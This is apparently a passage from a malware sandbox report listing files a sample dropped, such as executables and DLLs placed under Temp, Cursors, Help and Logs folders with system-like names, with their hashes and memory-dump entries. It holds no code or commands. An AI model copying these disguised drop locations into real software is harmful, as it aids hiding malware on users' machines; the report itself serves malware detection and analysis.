SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
\Users\Admin\AppData\Local\Temp\MSSQLH.exe
MD5
4f824985f3aa38c89d6ce76e87f3f1c9

SHA1
8f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5

SHA256
dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4

SHA512
1cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3

Download Submit
\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
\Users\Admin\AppData\Local\Temp\x64.exe
MD5
1fc1c860e86a8fbc2021d2567d62f703

SHA1
42ea2c9f4548614574dff36e019ae1cbc68b54e3

SHA256
76005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306

SHA512
fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c

Download Submit
\Windows\Cursors\WUDFhosts.exe
MD5
4a72e30c0a582b082030adfd8345014f

SHA1
2f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353

SHA256
e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976

SHA512
8a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798

Download Submit
\Windows\Help\active_desktop_render.dll
MD5
14e2b194b652d4fd912404775a6ae898

SHA1
e93f529bb61e12c41426cb2b86176bf0af387c09

SHA256
24ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c

SHA512
b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6

Download Submit
\Windows\Logs\RunDllExe.dll
MD5
c02d9300deea8aaa42bf5e9c56ddcf29

SHA1
4c547bab0a92ba6fe77a8bfcef56faf5f1a0ad89

SHA256
54dd6ca2fab1eab858fa8d06fa095a943d6d1ff601c71a4c6af5e9061019f9d5

SHA512
c2537d3bf63bf67ac0e844fc65285bcd444896201fd14add9bef7bab054eb93269248ecfa752268e3f692bb8ea3bc8d861e40f4ba5f63b5428f8f75a204315e1

Download Submit
memory/324-106-0x0000000000000000-mapping.dmp

Download
memory/324-78-0x0000000000000000-mapping.dmp

Download
memory/332-80-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/332-91-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/332-84-0x00000000004054EC-mapping.dmp

Download
memory/332-79-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/332-81-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/572-104-0x0000000000000000-mapping.dmp

Download
memory/580-72-0x0000000076A81000-0x0000000076A83000-memory.dmp

Filesize
8KB

Download
memory/580-70-0x0000000000000000-mapping.dmp

Download
memory/596-92-0x00000000004054EC-mapping.dmp

Download
memory/852-61-0x0000000000000000-mapping.dmp

Download
memory/876-122-0x0000000000000000-mapping.dmp

Download
memory/1016-118-0x0000000000000000-mapping.dmp

Download
memory/1064-142-0x0000000000810000-0x0000000000820000-memory.dmp

Filesize
64KB

Download
memory/1064-139-0x0000000000000000-mapping.dmp

Download
memory/1064-141-0x00000000007E0000-0x00000000007F0000-memory.dmp

Filesize
64KB

Download
memory/1064-143-0x0000000000830000-0x0000000000840000-memory.dmp

Filesize
64KB

Download
memory/1064-144-0x00000000008C0000-0x00000000008D0000-memory.dmp

Filesize
64KB

Download
memory/1092-112-0x0000000000000000-mapping.dmp

Download
memory/1104-120-0x0000000000000000-mapping.dmp

Download
memory/1176-108-0x0000000000000000-mapping.dmp

Download
memory/1284-126-0x0000000000000000-mapping.dmp

Download
memory/1444-110-0x0000000000000000-mapping.dmp

Download
memory/1532-132-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1532-131-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1532-134-0x0000000010072B6D-mapping.dmp

Download
memory/1532-136-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1532-130-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1532-129-0x0000000010000000-0x000000001010C000-memory.dmp

Filesize
1.0MB

Download
memory/1676-102-0x0000000000000000-mapping.dmp

Download
memory/1680-65-0x0000000000000000-mapping.dmp

Download
memory/1868-116-0x0000000000000000-mapping.dmp

Download
memory/1988-99-0x0000000000000000-mapping.dmp

Download
memory/2000-114-0x0000000000000000-mapping.dmp

Download